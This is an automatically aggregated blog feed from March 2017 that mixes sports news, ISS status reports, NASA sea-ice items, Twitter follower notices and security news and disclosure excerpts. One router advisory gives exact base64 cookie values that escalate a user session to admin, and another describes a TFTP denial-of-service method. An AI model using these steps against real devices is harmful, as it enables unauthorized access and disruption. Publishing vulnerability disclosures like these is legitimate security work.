Latest YouTube Video

Saturday, March 25, 2017

Anonymous Coach: 'Great Hire' For IU In Archie Miller

Anonymous Coach: 'Great Hire' For IU In Archie Miller. Jordan Wells | Staff Writer. With the news of Indiana hiring (now former) Dayton head coach ...

from Google Alert - anonymous http://ift.tt/2o45vPo
via IFTTT

Anonymous witness testifies in murder case

An anonymous witness gave police information that led to the arrests of two men shortly after a man was murdered off East Street, a supreme court jury ...

from Google Alert - anonymous http://ift.tt/2nzhyXd
via IFTTT

Wilton album, folio 68: The Holy family, the Christ child reaching over the Virgin Mary's left shoulder ...

Artist: Anonymous. Artist: After Guido Reni (Italian, Bologna 1575–1642 Bologna). Date: ca. 1600–42. Medium: Etching. Dimensions: Sheet (Trimmed): ...

from Google Alert - anonymous http://ift.tt/2oh4qTR
via IFTTT

Ravens: Will Timmy Jernigan be traded this offseason? Barring tremendous offer, smart play is to hold onto him - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Fraudsters Using GiftGhostBot Botnet to Steal Gift Card Balances

Gift cards have once again caused quite a headache for retailers, as cyber criminals are using a botnet to break into and steal cash from money-loaded gift cards provided by major retailers around the globe. Dubbed GiftGhostBot, the new botnet specialized in gift card fraud is an advanced persistent bot (APB) that has been spotted in the wild by cyber security firm Distil Networks.


from The Hacker News http://ift.tt/2nhjuBG
via IFTTT

I have a new follower on Twitter


Cash Flow Chimp
Be Honest, Have Integrity, And Do What You Said You'd Do
Anaheim, CA
https://t.co/Mta3VVYUNq
Following: 1914 - Followers: 2105

March 25, 2017 at 09:02AM via Twitter http://twitter.com/ChimpFlow

My self-directed IRA

You shouldn't necessarily "Do it" but I'm doing it and find it fun and maybe profitable as well.

from Google Alert - anonymous http://ift.tt/2o2m5zp
via IFTTT

I have a new follower on Twitter


Ester Figueroa
Looking for a faster way to get thousands of Soundcloud views? or Twitter followers? This website can help you https://t.co/EZL1gnreux
Guatemala

Following: 2767 - Followers: 61

March 25, 2017 at 03:20AM via Twitter http://twitter.com/ejuqizoducaguj

Friday, March 24, 2017

NFL Draft: Michigan's Taco Charlton met with Ravens Thursday night - Michael Rothstein; Todd McShay's No. 17 prospect (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous

Find & apply online for the latest Jobs from Anonymous with reed.co.uk, the UK's #1 job site.

from Google Alert - anonymous http://ift.tt/2oe4Fio
via IFTTT

ISS Daily Summary Report – 3/23/2017

Space Headaches Questionnaire: The crew performed their weekly questionnaire, answering questions utilizing the Data Collection Tool.  This European Space Agency (ESA) investigation collects information that may help in the development of methods to alleviate associated symptoms and improvement in the well-being and performance of crewmembers in space. Headaches during space flight can negatively affect mental and physical capacities of crewmembers that can influence performance during a space mission.  MagVector Closeout:  The crew completed closeout and cleanup activities for Science Run#9 of MagVector. The run was initiated on March 16, 2016 and has been ongoing for a week. MagVector and the venting system will be subsequently deactivated until a new science run is initiated. Cleanup steps included verifying the experiment has finished and moving the external USB memory drive to an Space Station Computer (SSC) for downlink and powering off the MagVector. The investigation studies how Earth’s magnetic field interacts with an electrical conductor. Using extremely sensitive magnetic sensors placed around and above a conductor, researchers can gain insight into ways that the magnetic field influences how conductors work. This research not only helps improve future ISS experiments and electrical experiments, but it could offer insights into how magnetic fields influence electrical conductors in general – the backbone of our technology. Remote Power Control Module (RPCM) LAS52A3B-A RPC 4 Remove & Replace (R&R): On March 17, 2017, this RPC which powers Common Video Interface Unit (CVIU) 4 failed to close when commanded. The fault signature was indicative of a Field Effect Transistors (FET) Controller Hybrid (FCH) failure. The crew was successful in replacing the RPCM this morning, restoring functionality to RPC 4 and CVIU 4. Extravehicular Activity (EVA) #40 Preparations: The crew completed the following in preparation for tomorrow’s EVA: Configured 2 EVA GoPro cameras. Relocated Station Support Computers (SSCs) 8 and 9 in the US Lab for EVA video. Updated procedures in the EVA Systems Checklist book. Configured EVA tools. Performed procedures review followed by a conference with ground teams. Prepared Equipment Lock, EMUs, and required ancillary hardware. Today’s Planned Activities All activities were completed unless otherwise noted. Test video recording for RT TV channel Preparation of Reports for Roscosmos Web Site and Social Media URAGAN. Observation and photography EKON-M. Observations and photography Biochemical Urine Test Extravehicular Activity (EVA) Reminder for On-Orbit Fitcheck Verification (OFV) NEUROIMMUNITET. Saliva Sample. Psychological Test (morning) Biochemical Urine Test NEUROIMMUNITET. Venous blood sample processing (smear). KORREKTSIYA. NEUROIMMUNITET. Venous blood sample processing using Plasma-03 centrifuge Insertion of Russian experiments blood samples into MELFI URISYS Hardware Stowage On MCC GO Regeneration of БМП Ф2 Micropurification Cartridge (start) Health Maintenance System (HMS) Periodic Health Status (PHS) Pre EVA Examination Changeout of Replaceable Condensate Removal Lines [СМОК].  Replacing ИДЭ-3 Smoke Detectors in FGB Regenerative Environmental Control and Life Support System (RGN) Wastewater Storage Tank Assembly (WSTA) Fill NEUROIMMUNITET. Psychological Test Relocate Station Support Computers (SSCs) 8 and 9 in the US Lab NEUROIMMUNITET. Hair Samples Collection Recharging Soyuz 733 Samsung PC Battery (if charge level is below 80%) In-flight Maintenance (IFM) LAB1S5 Remote Power Controller Module (RPCM) Remove and Replace BIOCARD. Experiment Session EVA Systems book and Extravehicular Mobility Unit (EMU) Cuff Checklist Print Extravehicular Activity (EVA) Tool Configuring PILLE dosimeter data download and placement before USOS EVA ISS HAM Service Module Pass Terminate Soyuz 733 Samsung PC Battery Charge (as necessary) Recharging Soyuz 732 Samsung PC Battery (if charge level is below 80%) USB Jumpdrive Return and PPS1 Reconfiguration RGN WSTA Fill Robotic Workstation (RWS) Setup Changeout of Replaceable Condensate Removal Lines [СМОК] Extravehicular Activity (EVA) iPad Contingency Procedures preparation Photo TV GoPro Setup MOTOCARD. Experiment Ops Extravehicular Activity (EVA) Procedure Review Equipment Lock (E-LK) Preparation RS Comm Panel Head set and PTT switch audit Terminate Soyuz 732 Samsung PC Battery Charge (as necessary) Extravehicular Activity (EVA) Tool Audit. INTERACTION-2. Experiment Ops Space Headaches – Weekly Questionnaire NEUROIMMUNITET. Saliva Sample. Psychological Test On MCC GO Regeneration Micropurification Unit (БМП) Ф2 Absorption Cartridge             Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. EVA preparation activities Three-Day Look Ahead: Friday, 03/24: EPIC MDM/SPDM Lube EVA, Orbital-7 Launch Saturday, 03/25: Crew off duty, EMU water recharge, EVA debrief, Fluid Shifts h/w gather Sunday, 03/26: Crew off duty, N2 CBCS powerup, PMA3 relocate QUICK ISS Status – Environmental Control Group:   Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off           [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Standby Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) ReProcess Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2ocQxpt
via IFTTT

Google Chrome to Distrust Symantec SSLs for Mis-issuing 30,000 EV Certificates

Google announced its plans to punish Symantec by gradually distrusting its SSL certificates after the company was caught improperly issuing 30,000 Extended Validation (EV) certificates over the past few years. The Extended Validation (EV) status of all certificates issued by Symantec-owned certificate authorities will no longer be recognized by the Chrome browser for at least a year until


from The Hacker News http://ift.tt/2mXOXXy
via IFTTT

[FD] Defense in depth -- the Microsoft way (part 46): no checks for common path handling errors in "Application Verifier"

Anonymous Crew eye K2 million Kajive price money

Mzuzu-based dance group Anonymous Crew has said dance entertainment is a great way of adding life and excitement to any event. The versatile ...

from Google Alert - anonymous http://ift.tt/2nKCKtZ
via IFTTT

anonymous on Behance

Showcase and discover the latest work from top online portfolios by creative professionals across industries.

from Google Alert - anonymous http://ift.tt/2mXGPXa
via IFTTT

IN RE: JOSE DH-P. (Anonymous)

Case opinion for NY Supreme Court IN RE: JOSE D. H.-P. (Anonymous). Read the Court's full decision on FindLaw.

from Google Alert - anonymous http://ift.tt/2nKTlO2
via IFTTT

7 minutes ago

... (via payment trail) would result in removal? I am unfamiliar with the intricacies of the verified account system, so perhaps large anonymous users are ...

from Google Alert - anonymous http://ift.tt/2mXIXhq
via IFTTT

Internetaholics Anonymous

Your name was given to us by a spouse or family member who is concerned about your internet addiction. At Internetaholics Anonymous, we can help.

from Google Alert - anonymous http://ift.tt/2nKCJWX
via IFTTT

US Senate Just Voted to Let ISPs Sell Your Web Browsing Data Without Permission

The ISPs can now sell certain sensitive data like your browsing history without permission, thanks to the US Senate. The US Senate on Wednesday voted, with 50 Republicans for it and 48 Democrats against, to roll back a set of broadband privacy regulations passed by the Federal Communication Commission (FCC) last year when it was under Democratic leadership. In October, the Federal


from The Hacker News http://ift.tt/2mXpnlB
via IFTTT

Thursday, March 23, 2017

We will have this ou

We will have this out for servo control class. #towsonmakerspace http://ift.tt/2mYiK3l



from Patrick McGuire http://ift.tt/2o8Rzmj
via IFTTT

Exclusive: Wikileaks reveals CIA's MacOS and iPhone Hacking Techniques

As part of its "Vault 7" series, Wikileaks has just released another batch of classified information that focused on exploits, hacking tools and techniques CIA created to hack Apple MacBook and iOS devices. Dubbed "Dark Matter," this second batch of CIA revelation contains five documents on Mac and iPhone hacks developed by the CIA. The hacking tools and techniques were developed by the


from The Hacker News http://ift.tt/2nVxOjd
via IFTTT

ISS Daily Summary Report – 3/22/2017

As mentioned at the IMMT this morning, the teams have been assessing their ability to support 2 EVAs and the PMA3 relocation prior to the arrival to OA-7.  This was reviewed at the Inc 50 JOP this afternoon and there were no issues identified.  Based on this and the IMMT Chair’s approval, we have baselined the following plan: March 24 – EVA1 (EPIC MDM and SPDM LEE Lube) March 26 – PMA3 Relocation from N3 to N2 March 30 – EVA2 (EPIC MDM and Shields) April 2 – OA7 Capture/Berthing April 6 – EVA3 (ExPCA R&R)  The OA7 launch date is currently under review. Once OATK and ULA determine their launch date, then we will re-assess the Apr 2 OA7 capture/berth date and the Apr 6 EVA date as required.  

from ISS On-Orbit Status Report http://ift.tt/2nr7gZi
via IFTTT

Sunny today! With a

Sunny today! With a high of 47F and a low of 32F.



from Patrick McGuire http://ift.tt/2o8766b
via IFTTT

Russian Hacker Pleads Guilty to Developing and Distributing Citadel Trojan

A Russian man accused of developing and distributing the Citadel malware, which infected nearly 11 Million computers globally and caused over $500 Million in losses, has finally pleaded guilty to charges of computer fraud. Mark Vartanyan, 29, who was very well known as "Kolypto," pleaded guilty in an Atlanta courtroom on Monday to charges related to computer fraud and is now co-operating with


from The Hacker News http://ift.tt/2nfONON
via IFTTT

Minimum Antarctic Sea Ice 2017

Ths year's record low annual sea ice minimum of 2.11 million square kilometers was below the previous lowest minimum extent in the satellite record, which occurred in 1997. Antarctic sea ice saw an early maximum extent in 2016, followed by a very rapid loss of ice starting in early September. Since November, daily Antarctic sea ice extent has continuously been at its lowest levels in the satellite record. The ice loss slowed down in February. "There's a lot of year-to-year variability in both Arctic and Antarctic sea ice, but overall, until last year, the trends in the Antarctic for every single month were toward more sea ice," said Claire Parkinson, a senior sea ice researcher at Goddard. "Last year was stunningly different, with prominent sea ice decreases in the Antarctic. To think that now the Antarctic sea ice extent is actually reaching a record minimum, that's definitely of interest." The images shown here portray the sea ice as it was observed by the AMSR2 instrument onboard the Japanese Suzaku satellite. The opacity of the sea ice is derived from the AMSR2 sea ice concentration. The blueish white color of the sea ice is derived from the AMSR2 89 GHz brightness temperature. In some of the images. The Landsat Image Mosaic of Antarctica is shown over the continent.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2muRY6t
via IFTTT

Arctic Daily Sea Ice Concentration from Arctic Minimum 2016 to Arctic Maximum 2017

This animation shows the seasonal change in the extent of the Arctic sea ice between the Arctic minimum, September 10, 2016, and Arctic maximum on March 7, 2017. Arctic sea ice appears to have reached a record low wintertime maximum extent, according to scientists at NASA and the NASA-supported National Snow and Ice Data Center (NSIDC) in Boulder, Colo. This winter, a combination of warmer-than-average temperatures, winds unfavorable to ice expansion, and a series of storms halted sea ice growth in the Arctic. This year's maximum extent, reached on March 7 at 5.57 million square miles (14.42 million square kilometers), is only about 40,000 square miles below the previous record low, which occurred in 2016, The images shown here portray the sea ice as it was observed by the AMSR2 instrument onboard the Japanese Suzaku satellite. The opacity of the sea ice is derived from the AMSR2 sea ice concentration. The blueish white color of the sea ice is derived from the AMSR2 89 GHz brightness temperature. The annual cycle starts with the minimum extent reached on August 31, 2016 and runs through the daily sea ice concentration until the maximum occurs on March 3, 2017. The Arctic's sea ice maximum extent has dropped by an average of 2.8 percent per decade since 1979, the year satellites started measuring sea ice. The summertime minimum extent losses are nearly five times larger: 13.5 percent per decade. Besides shrinking in extent, the sea ice cap is also thinning and becoming more vulnerable to the action of ocean waters, winds and warmer temperatures.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2mWQWfN
via IFTTT

I have a new follower on Twitter


Diego Callazans
poeta brasileiro contemporâneo. anarquista, vegano, pagão/politeísta. esteja avisado.

https://t.co/3Wv9vrsCZF
Following: 600 - Followers: 448

March 23, 2017 at 03:35AM via Twitter http://twitter.com/diegocallazans

Wednesday, March 22, 2017

Kiper Mock Draft 3.0: Ravens grab Wisconsin OT Ryan Ramczyk at No. 16; \"considered one of the top three offensive tackles in the draft\" - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous Individual Donates $4M to Pay Off PA Church's Mortgage

An historic African American church in Pennsylvania recently received the blessing of a lifetime. “We got a call from Citizens […]

from Google Alert - anonymous http://ift.tt/2nSB7rf
via IFTTT

One Anonymous Bloke

One: Slater and Co initially... sorts is an activist authorities don't dare arrest because... when he knows certain anonymous people have records of ...mr ...

from Google Alert - anonymous http://ift.tt/2nJYeaB
via IFTTT

Hackers Using Fake Cellphone Towers to Spread Android Banking Trojan

Chinese Hackers have taken Smishing attack to the next level, using rogue cell phone towers to distribute Android banking malware via spoofed SMS messages. SMiShing — phishing attacks sent via SMS — is a type of attack wherein fraudsters use number spoofing attack to send conceiving bogus messages to trick mobile users into downloading a malware app onto their smartphones or lures victims


from The Hacker News http://ift.tt/2o4WTan
via IFTTT

\"I am a guy of swagger\" - Tony Jefferson used Madden to see himself in different jerseys before signing with Ravens - NFL.com (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens TE Dennis Pitta took $2.5M pay cut for next 2 seasons to remain with team, was to make $5.5M each year - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 3/21/2017

Intracranial Pressure & Visual Impairment (IPVI):  The crew obtained both front-on and profile view pictures to check for facial edema followed by a conference with ground teams.  Scheduled at Launch + 4 months (L+4m), the IPVI investigation studies changes to crewmembers’ eyes and optic nerves by analyzing arterial blood pressure and blood flow to the brain before and after spaceflight. The IPVI investigation uses non-invasive methods as compared to current invasive methods (spinal tap) to measure intracranial pressure. Extravehicular Activity (EVA) #40 Preparations: The crew participated in a briefing covering the following preparations: Crew member specific reminders Suit specifics and refreshers Key points in an emergency EVA day procedure sequence EVA day comm overview for suits Hardware management The crew is also performed the following: Onboard Training (OBT) EVA Robotics Onboard Trainer (ROBoT) session. Verified Simplified Aid for EVA Rescue (SAFER) is functional prior to EVA. Installed Rechargeable EVA Battery Assembly (REBA) in EMUs 3006 and 3008. Verified EMU 3006 and 3008 glove heater functionality. Environmental Health System (EHS) Surface Sample Kit (SSK), Microbial Air Samper (MAS): The crew pre-gathered items for MAS and SSK sampling planned for tomorrow. Mobile Servicing System (MSS) Operations: Yesterday and overnight, Robotics Ground Controllers powered up the MSS and walked the Space Station Remote Manipulator System (SSRMS) off the Lab Power Data Grapple Fixture (PDGF) onto the Functional Cargo Block (FGB) PDGF.  They then performed a survey of the Starboard side of 48 Soyuz (48S).  When the survey was completed, Controllers walked the SSRMS off the FGB PDGF onto the Lab PDGF and maneuvered the SSRMS to a park position.  MSS performance was nominal. Tracking and Data Relay Satellite (TDRS) 275 Recovery:  Overnight, TDRS 275 returned to service for S-Band and Ku-Band. The communications satellite had been out of service due to timeout event which occurred on 3/16/17. The TDRS Network continues to investigate the root cause of the anomaly. Today’s Planned Activities All activities were completed unless otherwise noted. KORREKTSIYA. Logging Liquid and Food (Medicine) Intake MORZE. Logging Liquid and Food (Medicine) Intake Photography of RS windows (3, 5, 6, 7, 8, 9, 26 in SM) VIZIR. Experiment set up and start using СКПИ P/L Diagnostics of FGB Power Supply System Filter Units (БФ-2) and Main Bus Assembly (БСШ-2) with Infra-Red camera.  Monitoring RS structural shell surfaces using Multipurpose Eddy Current Device МВП-2К (Cross-section of SA setup).  Collecting atmospheric condensate samples [КАВ] from [СРВ-К2М] up to Gas-Liquid Mixture Filter (ФГС) to Russian Samplers, terminate Sampling atmospheric condensate [КАВ] upstream of СРВ-К2М БКО (Water Purification Column Unit), configuration set up, sampler installation (drink bag) Data prep on monitoring RS structural surfaces for downlink via OCA In Flight Maintenance (IFM) Waste and Hygiene Compartment (WHC) Full Fill Sampling atmospheric condensate [КАВ] upstream of БКО СРВ-К2М, Sampler Change out (drink bag) Intracranial Pressure & Visual Impairment (IPVI) Face Photo-taking ASEPTIC. Samples photo after incubation БРП-М water sampling to drink bags VIZIR. СКПИ Closeout Ops Charging EVA Camera D4 Battery Extravehicular Activity (EVA) Procedure Review SVO-ZV water sampling to Russian drink bags ASEPTIC Photo Edit and Downlink Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ Preparing for Changing Replaceable Condensate Removal Lines.  ASEPTIC. Cryogem-03 Removal Delta file prep MORZE. Experiment setup Extravehicular Activity (EVA) Airlock Unstow Simplified Aid For EVA Rescue (SAFER) Checkout On-board Training (OBT) EVA Robotics Onboard Trainer (ROBoT) Session Robotic Workstation (RWS) Teardown Surface Sampler Kit (SSK) and Microbial Air Sampler (MAS) Gather Rechargeable EVA Battery Assembly (REBA) Installation Sampling Condensate Water [КАВ] upstream of [СРВК-2М] БКО (Water Purification Column Unit), sampler (drink bag) removal, configuration teardown Rechargeable EVA Battery Assembly (REBA) Powered Hardware Checkout Completed Task List Items ARED Detent Follow Up (Completed GMT 79) Carbon Dioxide Monitor (CDM) Set-up (Completed GMT 79) ESA Active Dosimeter Area Monitoring Mobile Unit Stow (Completed GMT 79) EVA Fluid QD Fam (Completed GMT 79) Crew evaluation of EveryWear Medical Module Medication list (Completed GMT 79) PMM Cleanup (Completed GMT 79) Carbon Dioxide Monitor (CDM) Data Download (Completed GMT 79 and 80) Ground Activities All activities were completed unless otherwise noted. ROBoT OBT support SSRMS walkoff from N2 PDGF A to MBS3 Three-Day Look Ahead: Wednesday, 03/22: MELFI Icebrick Install, MSL SCA Exchange, Surface/Microbial Sampling, BEAM Ingress/Google Streetview, EVA Preps (ROBoT, Camera Config), CMO OBT Thursday, 03/23: EVA Preps (Procedure Review/Conf, Tool Config, Equip Lock Prep, Tool Audit) Friday, 03/24: EPIC MDM/SPDM Lube EVA, Orbital-7 Launch QUICK ISS Status – Environmental Control Group:   Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off           [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Standby Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) ReProcess Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2nmPN3R
via IFTTT

Hackers Threaten to Remotely Wipe 300 Million iPhones Unless Apple Pays Ransom

If you use iCloud to sync your Apple devices, your private data may be at risk of getting exposed or deleted by April 7th. It has been found that a mischievous group of hackers claiming to have access to over 300 million iCloud accounts is threatening Apple to remotely wipe data from those millions of Apple devices unless Apple pays it $75,000 in crypto-currency or $100,000 worth of iTunes


from The Hacker News http://ift.tt/2nAPUcL
via IFTTT

I have a new follower on Twitter


Crowdfunding Promo
I help people spread out word about their crowdfunding projects on websites like #Indiegogo #kickstarter and #others My online office is at link bellow:
New York
http://t.co/as4BeseoqU
Following: 16735 - Followers: 141222

March 22, 2017 at 06:05AM via Twitter http://twitter.com/Crowdfund_Promo

[FD] SEC Consult SA-20170322-0 :: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices

SEC Consult Vulnerability Lab Security Advisory < 20170322-0 > ======================================================================= title: Multiple vulnerabilities product: Solare Datensysteme GmbH Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000 vulnerable version: Firmware 2.8.4-56 / 3.5.2-85 fixed version: Firmware 3.5.3-86 CVE number: - impact: Critical homepage: http://ift.tt/2mTDiK6 found: 2017-01-23 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich http://ift.tt/1mGHMNR ======================================================================= Vendor description:

Source: Gmail -> IFTTT-> Blogger

Improvisers Anonymous comedy at ImproFest

Improvisers Anonymous are a London based improvisation group, holding an event on Monday 27th March 17 at 7pm. Aim to have a full audience.

from Google Alert - anonymous http://ift.tt/2mTtEav
via IFTTT

Unpatchable 'DoubleAgent' Attack Can Hijack All Windows Versions — Even Your Antivirus!

A team of security researchers from Cybellum, an Israeli zero-day prevention firm, has discovered a new Windows vulnerability that could allow hackers to take full control of your computer. Dubbed DoubleAgent, the new injecting code technique works on all versions of Microsoft Windows operating systems, starting from Windows XP to the latest release of Windows 10. What's worse? DoubleAgent


from The Hacker News http://ift.tt/2mTmVND
via IFTTT

Tuesday, March 21, 2017

bind vs anonymous function

bind vs anonymous function. JavaScript performance comparison. Test case created by Brad Bohen 7 minutes ago ...

from Google Alert - anonymous http://ift.tt/2mSaKko
via IFTTT

user.role.anonymous.yml

8.2.x core/modules/user/config/install/user.role.anonymous.yml · 8.0.x core/modules/user/config/install/user.role.anonymous.yml · 8.1.x ...

from Google Alert - anonymous http://ift.tt/2mqsln6
via IFTTT

Andrew Napolitano absent from Fox after citing anonymous spying claims

Fox News pulls Judge Napolitano over his Trump wiretap claims — Judge Andrew Napolitano, the senior judicial analyst for Fox News, is being kept ...

from Google Alert - anonymous http://ift.tt/2nPg9cK
via IFTTT

Anonymous feedback can encourage criticism and blame

360 reviews and other forms of anonymous feedback have their place, but they shouldn't be a default mechanism because they have their own flaws ...

from Google Alert - anonymous http://ift.tt/2nHd3dR
via IFTTT

Ravens have pre-draft visit set up with Washington's John Ross - NFL Network; Todd McShay's projects WR to Baltimore at No. 16 (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Sandra Johns
if you like my body try this web chat with me https://t.co/uFmNiH8Kpx

https://t.co/uFmNiH8Kpx
Following: 98 - Followers: 0

March 21, 2017 at 11:30AM via Twitter http://twitter.com/niyf9yak75lyd

How Orioles closer Zach Britton accidentally became the new Mariano Rivera - Jayson Stark (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

NFL Free Agency: Colts will sign WR Kamar Aiken to one-year deal, according to his agent; 128 catches, 9 TD over last 3 seasons with Ravens (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 3/20/2017

With the decision today to move the OA7 launch to NET March 27, we have decided to move the IMMT OA7 Readiness Review from March 22 to March 27.  We will have the IMMT OA7 RR at 08:00 CDT on March 27 and if OA7 launches later that day, it would be around 18:49 CDT.   We will still have an IMMT this Wednesday, March 22, but the focus will be on the EVA Readiness Review, including the EPIC Ext R9 Transition Readiness Review.

from ISS On-Orbit Status Report http://ift.tt/2n3Gzrp
via IFTTT

I have a new follower on Twitter


Cody Warner Buck
Live a life that matters. Say what you mean, & don't be shy. Always remember where you came from and your purpose. Never let someone tell you your not worth it!
U.S.A Texas & Arkansas
https://t.co/xnnSTbKbYT
Following: 2177 - Followers: 10265

March 21, 2017 at 07:54AM via Twitter http://twitter.com/codywbuck

Searching for Leaked Celebrity Photos? Don't Blindly Click that Fappening Link!

Are you curiously googling or searching torrents for nude photos or videos of Emma Watson, Amanda Seyfried, Rose McGowan, or any other celebrities leaked in The Fappenning 2.0? If yes, then beware, you should not click any link promising Fappenning celebrity photos. Cybercriminals often take advantage of news headlines in order to trap victims and trick them into following links that may


from The Hacker News http://ift.tt/2nNsgXV
via IFTTT

TecnologiaLibre (@TecnologiaFree) retweeted your Tweet!

@mistermcguire: [FD] Adium vulnerable to remote code execution via libpurple   TecnologiaLibre retweeted your Tweet. View   Patrick McGuire @mistermcguire =   [FD] Adium vulnerable to remote code execution via libpurple ift.tt/2n31gU6   Settings | Help | Opt-out | Download app Twitter, Inc. 1355 Market Street, Suite 900 San Francisco, CA 94103

Source: Gmail -> IFTTT-> Blogger

Updated: Justyne Caruana denies anonymous letter allegations about Gozo drug case

Parliamentary Secretary Justyne Caruana has denied having any connections with the Gozo drug case, after she was mentioned in an anonymous ...

from Google Alert - anonymous http://ift.tt/2n31zyb
via IFTTT

[FD] Adium vulnerable to remote code execution via libpurple

Adium is a popular instant messaging client for MacOS (OSX) that incorporates libpurple. The current release (1.5.10.2) is vulnerable to CVE-2017-2640 in libpurple, which permits execution of arbitrary code on the client. The Adium team has been aware of the vulnerability since at least March 15, but has not released an advisory to its users, for reasons unknown. A post to the official developer's mailing list, which included vulnerability information and queries about Adium's process for handling upstream advisories from libpurple, has gone unanswered. Adium's build process documentation does not seem to include steps for upgrading or rebuilding libpurple, and the copy of libpurple checked into Adium's open-source repository as a binary blob of unknown provenance. Eryt

Source: Gmail -> IFTTT-> Blogger

Monday, March 20, 2017

I have a new follower on Twitter


Enrico Smiley
Member of NVIDIA Recruiting Team, keeping you up to date on #NVIDIA news and #careeropportunities. Opinions are my own. #deeplearning #engineering #gaming
Dinuba, CA
https://t.co/KMuHlgp32N
Following: 1981 - Followers: 1836

March 20, 2017 at 05:39PM via Twitter http://twitter.com/Enrico_Smiley

Re: [FD] Remote code execution via CSRF vulnerability in the web UI of Deluge 1.3.13

On 2017-03-05 07:22, Kyle Neideck wrote: > Remote code execution via CSRF vulnerability in the web UI of Deluge 1.3.13 > > Kyle Neideck, February 2017 > > > Product >

Source: Gmail -> IFTTT-> Blogger

Re: [FD] SEC Consult SA-20170316-0 :: Authenticated command injection in multiple Ubiquiti Networks products

Re: [FD] 0-Day: Dahua backdoor Generation 2 and 3

Greetings, With my newfound knowledge of vulnerable devices out there with an unbelievable number of more than 1 million Dahua / OEM units, where knowledge comes from a report made by NSFOCUS and my own research on shodan.io. With this knowledge, I will not release the Python PoC to the public as before said of April 5, as it is not necessary when the PoC has already been verified by IPVM and other independent security researchers. However, I'm open to share the PoC with serious security researchers if so desired, please e-mail me off list and be clear about who you are so I do not take you for a beggar, which I ignore. NSFOCUS report: http://ift.tt/2nLv7QX /bashis

Source: Gmail -> IFTTT-> Blogger

Re: [FD] TS Session Hijacking / Privilege escalation all windows versions

[FD] Cookie based privilege escalation in DIGISOL DG-HR1400 1.00.02 wireless router.

Title: ====== Cookie based privilege escalation in DIGISOL DG-HR1400 1.00.02 wireless router. CVE Details: ============ CVE-2017-6896 Reference: ========== http://ift.tt/2n1AwDn http://ift.tt/2n7mIce http://ift.tt/2nWso6F Credit: ====== Name: Indrajith.A.N Website: http://ift.tt/2kISZqG Date: ==== 13-03-2017 Vendor: ====== DIGISOL router is a product of Smartlink Network Systems Ltd. is one of India's leading networking company. It was established in the year 1993 to prop the Indian market in the field of Network Infrastructure. Product: ======= DIGISOL DG-HR1400 is a wireless Router Product link: http://ift.tt/2ls5tju Abstract details: ================= privilege escalation vulnerability in the DIGISOL DG-HR1400 wireless router enables an attacker escalate his user privilege to an admin just by modifying the Base64encoded session cookie value Affected Version: ============= <=1.00.02 Exploitation-Technique: =================== Remote Severity Rating: =================== 8 Proof Of Concept 1: ================== 1) Login to the router as a User where router sets the session cookie value to VVNFUg== (Base64 encode of "USER") 2) So Encode "ADMIN" to base64 and force set the session cookie value to QURNSU4= 3) Refresh the page and you are able to escalate your USER privileges to ADMIN. Proof Of Concept 2: ================== http://ift.tt/2n6Q36x Disclosure Timeline: ====================================== Vendor Notification: 13/03/17

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2017-7183 ExtraPuTTY v029_RC2 TFTP Denial Of Service

[+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://ift.tt/2nKaapF [+] ISR: ApparitionSec Vendor: ================== www.extraputty.com Product: ====================== ExtraPuTTY - v029_RC2 hash: d7212fb5bc4144ef895618187f532773 Also Vulnerable: v0.30 r15 hash: eac63550f837a98d5d52d0a19d938b91 ExtraPuTTY is a fork from 0.67 version of PuTTY. ExtraPuTTY has all the features from the original soft and adds others. Below a short list of the principal features (see all features): DLL frontend TestStand API ( LabWindows ,TestStand 2012) timestamp StatusBar Scripting a session with lua 5.3. Automatic sequencing of commands. Shortcuts for pre-defined commands. Keyboard shortcuts for pre-defined command Portability (use of directories structure) Integrates FTP,TFTP,SCP,SFTP,Ymodem,Xmodem transfert protocols Integrates PuTTYcyg,PuTTYSC, HyperLink, zmodem and session manager projects Change default settings from configuration file Change putty settings during session PuTTYcmdSender : tool to send command or keyboard shortcut to multiple putty windows Vulnerability Type: ======================= TFTP Denial of Service CVE Reference: ============== CVE-2017-7183 Security Issue: ================ TFTP server component of ExtraPuTTY is vulnerable to remote Denial of Service attack by sending large junk UDP Read/Write TFTP protocol request packets. Open ExtraPuTTY Session Manager, select => Files Transfer => TFTP 